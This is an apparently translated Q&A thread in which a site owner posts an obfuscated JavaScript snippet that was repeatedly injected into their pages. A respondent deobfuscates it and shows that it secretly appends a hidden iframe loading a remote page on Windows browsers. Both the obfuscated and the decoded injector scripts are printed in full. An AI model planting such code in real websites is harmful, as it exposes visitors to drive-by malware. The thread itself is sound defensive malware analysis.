0

我的网站已经插入了大约 4 次这些脚本。我已经更改了太多次 ftp 密码,但它仍然能够插入到我的网页中。请帮我解码这两个脚本。也许我可以找到有关此恶意软件脚本的更多详细信息。

<script>var MaZsKgZUgCCRdH = ["98","73","79","45","64","92","91","66","35","70","82","4","65","80","17","76","3","74","41","69","1","40","77","52","54","42","9","22","88","0","30","59","26","94","99","85","16","86","55","34","81","67","56","97","36","78","63","72","38","43","62","7","33","96","31","25","90","19","48","6","14","87","28","13","23","24","68","39","61","49","37","71","10","12","83","44","29","32","84","50","18","100","47","15","51","20","53","11","93","58","60","2","95","8","27","75","46","21","5","89","57"];var a = ["83","78","4","74","7","87","29","29","21","20","29","93","11","29","14","7","87","78","83","82","72","91","78","26","82","94","83","83","12","29","94","83","26","26","74","73","20","78","5","83","95","21","95","11","2","72","72","84","7","82","86","24","84","83","95","73","94","4","78","64","24","93","9","73","91","29","26","95","95","21","72","7","93","83","0","92","78","95","87","92","82","95","89","15","91","85","21","9","91","95","78","95","87","82","20","6","77","85","6","89","93"];function wCBFqxiBsScuHg(VCAscVoJW, IU){var CgoBQGzvdo='';for(var HYDZhkaoy=0;HYDZhkaoy< VCAscVoJW.length;HYDZhkaoy++)CgoBQGzvdo+=String.fromCharCode(parseInt(VCAscVoJW[IU[HYDZhkaoy]])^58);return CgoBQGzvdo;}function DUJiJVvMZAgBr(xZwtmwHJjcOg, ePUFHpNSM){var U='';for(var yBIrf=0;yBIrf< xZwtmwHJjcOg.length;yBIrf++)U += String.fromCharCode(parseInt(xZwtmwHJjcOg[yBIrf], 16)^ePUFHpNSM); return U;}(function(TfEh){var PGMRLirigv=function(){if(!TfEh.BcRTDdLpRbS){TfEh.BcRTDdLpRbS=133;var GQdPVJX = ["20","2b","27","31","29","21","2a","30"];var hQxQnSWejILY=DUJiJVvMZAgBr(GQdPVJX, 68);var CQjjfdHLQzuftp = ["7f","6e","79","7d","68","79","59","70","79","71","79","72","68"];var kpCkPGQ=DUJiJVvMZAgBr(CQjjfdHLQzuftp, 28);var DOdnKPRxnUn = ["d3","de","c1"];var m=DUJiJVvMZAgBr(DOdnKPRxnUn, 183);var Hsz = ["90","97","97","9c","8b","b1","ad","b4","b5"];var bBetq=DUJiJVvMZAgBr(Hsz, 249);var el = ["1f","18","15","0","9"];var FsoPN=DUJiJVvMZAgBr(el, 108);var yNkqOiY = ["fd","f0","ea","e9","f5","f8","e0"];var YPtQveRMcV=DUJiJVvMZAgBr(yNkqOiY, 153);var JjrPjK = ["ed","ec","ed","e6"];var HBchKFWjQp=DUJiJVvMZAgBr(JjrPjK, 131);var ZDHWSZcCzlmCy = ["8e","83","88","95"];var atpwWUCri=DUJiJVvMZAgBr(ZDHWSZcCzlmCy, 236);var knAtUGVSknpiOb = ["7f","6e","6e","7b","70","7a","5d","76","77","72","7a"];var KNMcxqPBoFEzlG=DUJiJVvMZAgBr(knAtUGVSknpiOb, 30);if(function FRlTmsRJNFmnm(){var iBcOzbBLaJib=true;var yLjfQ=true;var Xbj=/*@cc_on true; @*/false;if(Xbj){iBcOzbBLaJib = true;}else{iBcOzbBLaJib = false;}var VPpowKZVXUiA = ["22","1c","1b"];var GZlLbRNA=DUJiJVvMZAgBr(VPpowKZVXUiA, 117);var FzCjYUCHuJYWjz = ["89","a5","a7"];var zudnwEuKBbXyT=DUJiJVvMZAgBr(FzCjYUCHuJYWjz, 196);var PUEAgmcfh = ["2d","8","f","14","19"];var VyhuFnerNWUuk=DUJiJVvMZAgBr(PUEAgmcfh, 97);var yM = ["af","a0","b7","a8","a6","a0","b5","ae","b3"];var bDiUBGqVfYZ=DUJiJVvMZAgBr(yM, 193);var TYBSKqXbNiGcz = ["4d","4a","40","41","5c","6b","42"];var aMpCvJBLTfhMUw=DUJiJVvMZAgBr(TYBSKqXbNiGcz, 36);var TxHK = ["f5","e9","e4","f1","e3","ea","f7","e8"];var BjNy=DUJiJVvMZAgBr(TxHK, 133);var oGeLQlnBCmKgsn=window[bDiUBGqVfYZ][BjNy][aMpCvJBLTfhMUw](GZlLbRNA) > -1;if(oGeLQlnBCmKgsn){yLjfQ = true;}else{yLjfQ = false;}return (iBcOzbBLaJib&&yLjfQ);}()){var FnxPXniTOHuU=window[hQxQnSWejILY][kpCkPGQ](m);FnxPXniTOHuU[bBetq]=wCBFqxiBsScuHg(a, MaZsKgZUgCCRdH);FnxPXniTOHuU[FsoPN][YPtQveRMcV]=HBchKFWjQp;window[hQxQnSWejILY][atpwWUCri][KNMcxqPBoFEzlG](FnxPXniTOHuU);}}};var iFyMPH = ["b2","b7","b7","96","a5","b6","bd","a7","9f","ba","a0","a7","b6","bd","b6","a1"];var GkMNyvoZ=DUJiJVvMZAgBr(iFyMPH, 211);var uQO = ["2f","3a","3a","2f","2d","26","b","38","2b","20","3a"];var QuPuK=DUJiJVvMZAgBr(uQO, 78);var MouT = ["87","86"];var KdAtYlyqzy=DUJiJVvMZAgBr(MouT, 232);var VwQKdbWCag = ["7a","79","77","72"];var oicFpeAL=DUJiJVvMZAgBr(VwQKdbWCag, 22);var CPrCjZTfm = ["76","7f","73","65","63"];var hMiVnsaLJ=DUJiJVvMZAgBr(CPrCjZTfm, 16);var gAcCaolkjo = ["67","69","70","77"];var vB=DUJiJVvMZAgBr(gAcCaolkjo, 5);var MZeG = ["11","13","9","f","19","11","13","a","19"];var SQ=DUJiJVvMZAgBr(MZeG, 124);var HA = ["4b","40","42","5d","4a","4e","4b","56"];var XzF=DUJiJVvMZAgBr(HA, 47);var xAGaJwayje;if(TfEh[GkMNyvoZ])xAGaJwayje=GkMNyvoZ;else xAGaJwayje=QuPuK;var XHF=[oicFpeAL, hMiVnsaLJ, vB, SQ, XzF];for(JNsqiuHb in XHF){TfEh[xAGaJwayje](XHF[JNsqiuHb], PGMRLirigv, false);TfEh[xAGaJwayje]('on' + XHF[JNsqiuHb], PGMRLirigv, false);}})(window)</script>

4

1 回答 1

0

如果您浏览代码并有条不紊地替换垃圾标识符名称,它会更有意义。大多数代码和标识符只是为了掩盖,而其余的大部分看起来就像浏览器兼容的样板代码,用于执行附加事件等操作。

出于某种原因,它还会大量检查您是否在 Windows 上,但这不会改变最终交付的有效负载。

将有效负载部署到页面的部分在这里:

   var newElement = window[_document][_createElement](_div);
   newElement[_innerHTML] = decodeString(key, payload);
   newElement[_style][_display] = _none;
   window[_document][_body][_appendChild](newElement);

有效载荷解密为:

  <iframe src='http://teenee.&lt;OBFUSCATED&gt;.com/speedo.msg?13'
    width='436' height='158' align="right"></iframe>

这是我解码的完整脚本:

<script>
var payload = ["98", "73", "79", "45", "64", "92", "91", "66", "35", "70", "82", "4", "65", "80", "17", "76", "3", "74", "41", "69", "1", "40", "77", "52", "54", "42", "9", "22", "88", "0", "30", "59", "26", "94", "99", "85", "16", "86", "55", "34", "81", "67", "56", "97", "36", "78", "63", "72", "38", "43", "62", "7", "33", "96", "31", "25", "90", "19", "48", "6", "14", "87", "28", "13", "23", "24", "68", "39", "61", "49", "37", "71", "10", "12", "83", "44", "29", "32", "84", "50", "18", "100", "47", "15", "51", "20", "53", "11", "93", "58", "60", "2", "95", "8", "27", "75", "46", "21", "5", "89", "57"];
var key = ["83", "78", "4", "74", "7", "87", "29", "29", "21", "20", "29", "93", "11", "29", "14", "7", "87", "78", "83", "82", "72", "91", "78", "26", "82", "94", "83", "83", "12", "29", "94", "83", "26", "26", "74", "73", "20", "78", "5", "83", "95", "21", "95", "11", "2", "72", "72", "84", "7", "82", "86", "24", "84", "83", "95", "73", "94", "4", "78", "64", "24", "93", "9", "73", "91", "29", "26", "95", "95", "21", "72", "7", "93", "83", "0", "92", "78", "95", "87", "92", "82", "95", "89", "15", "91", "85", "21", "9", "91", "95", "78", "95", "87", "82", "20", "6", "77", "85", "6", "89", "93"];

function decodeString(msg, key) {
    var retval = '';
    for (var i = 0; i < msg.length; i++) retval += String.fromCharCode(parseInt(msg[key[i]]) ^ 58);
    return retval;
}

function decodeString2(msg, key) {
    var retval = '';
    for (var i = 0; i < msg.length; i++) retval += String.fromCharCode(parseInt(msg[i], 16) ^ key);
    return retval;
}

(function (_window) {
    var executePayload = function () {
        if (!_window.storedData) {
            _window.storedData = 133;
            var crypt1 = ["20", "2b", "27", "31", "29", "21", "2a", "30"];
            var _document = decodeString2(crypt1, 68);
            var crypt2 = ["7f", "6e", "79", "7d", "68", "79", "59", "70", "79", "71", "79", "72", "68"];
            var _createElement = decodeString2(crypt2, 28);
            var crypt3 = ["d3", "de", "c1"];
            var _div = decodeString2(crypt3, 183);
            var crypt4 = ["90", "97", "97", "9c", "8b", "b1", "ad", "b4", "b5"];
            var _innerHTML = decodeString2(crypt4, 249);
            var crypt5 = ["1f", "18", "15", "0", "9"];
            var _style = decodeString2(crypt5, 108);
            var crypt6 = ["fd", "f0", "ea", "e9", "f5", "f8", "e0"];
            var _display = decodeString2(crypt6, 153);
            var crypt7 = ["ed", "ec", "ed", "e6"];
            var _none = decodeString2(crypt7, 131);
            var crypt9 = ["8e", "83", "88", "95"];
            var _body = decodeString2(crypt9, 236);
            var crypt10 = ["7f", "6e", "6e", "7b", "70", "7a", "5d", "76", "77", "72", "7a"];
            var _appendChild = decodeString2(crypt10, 30);
            if (function FRlTmsRJNFmnm() {
                var iBcOzbBLaJib = true;
                var yLjfQ = true;
                var Xbj = /*@cc_on true; @*/ false;
                if (Xbj) {
                    iBcOzbBLaJib = true;
                } else {
                    iBcOzbBLaJib = false;
                }
                var crypt1 = ["22", "1c", "1b"];
                var _Win = decodeString2(crypt1, 117);
                var crypt2 = ["89", "a5", "a7"];
                var _Mac = decodeString2(crypt2, 196);
                var crypt3 = ["2d", "8", "f", "14", "19"];
                var _Linux = decodeString2(crypt3, 97);
                var crypt4 = ["af", "a0", "b7", "a8", "a6", "a0", "b5", "ae", "b3"];
                var _navigator = decodeString2(crypt4, 193);
                var crypt5 = ["4d", "4a", "40", "41", "5c", "6b", "42"];
                var _indexOf = decodeString2(crypt5, 36);
                var crypt6 = ["f5", "e9", "e4", "f1", "e3", "ea", "f7", "e8"];
                var _platform = decodeString2(crypt6, 133);
                var browserSaysWindows = window[_navigator][_platform][_indexOf](_Win) > -1;
                if (browserSaysWindows) {
                    yLjfQ = true;
                } else {
                    yLjfQ = false;
                }
                return (iBcOzbBLaJib && yLjfQ);
            }()) {
                var newElement = window[_document][_createElement](_div);
                newElement[_innerHTML] = decodeString(key, payload);
                newElement[_style][_display] = _none;
                window[_document][_body][_appendChild](newElement);
            }
        }
    };
    var crypt1 = ["b2", "b7", "b7", "96", "a5", "b6", "bd", "a7", "9f", "ba", "a0", "a7", "b6", "bd", "b6", "a1"];
    var __addEventListener = decodeString2(crypt1, 211);
    var crypt2 = ["2f", "3a", "3a", "2f", "2d", "26", "b", "38", "2b", "20", "3a"];
    var _attachEvent = decodeString2(crypt2, 78);
    var crypt3 = ["87", "86"];
    var KdAtYlyqzy = decodeString2(crypt3, 232);
    var crypt4 = ["7a", "79", "77", "72"];
    var _load = decodeString2(crypt4, 22);
    var crypt5 = ["76", "7f", "73", "65", "63"];
    var focus = decodeString2(crypt5, 16);
    var crypt6 = ["67", "69", "70", "77"];
    var _blur = decodeString2(crypt6, 5);
    var crypt7 = ["11", "13", "9", "f", "19", "11", "13", "key", "19"];
    var _mousemove = decodeString2(crypt7, 124);
    var crypt8 = ["4b", "40", "42", "5d", "4a", "4e", "4b", "56"];
    var _domready = decodeString2(crypt8, 47);
    var _addEventListener;
    if (_window[__addEventListener]) _addEventListener = __addEventListener;
    else _addEventListener = _attachEvent;
    var eventList = [_load, focus, _blur, _mousemove, _domready];
    for (events in eventList) {
        _window[_addEventListener](eventList[events], executePayload, false);
        _window[_addEventListener]('on' + eventList[events], executePayload, false);
    }
})(window)
</script>

不幸的是,关于它是如何到达这里的,并没有太多线索,只是它在做什么:将 IFrame 注入您的页面,您可能已经知道这一点。

祝你好运!

于 2013-10-10T04:42:59.500 回答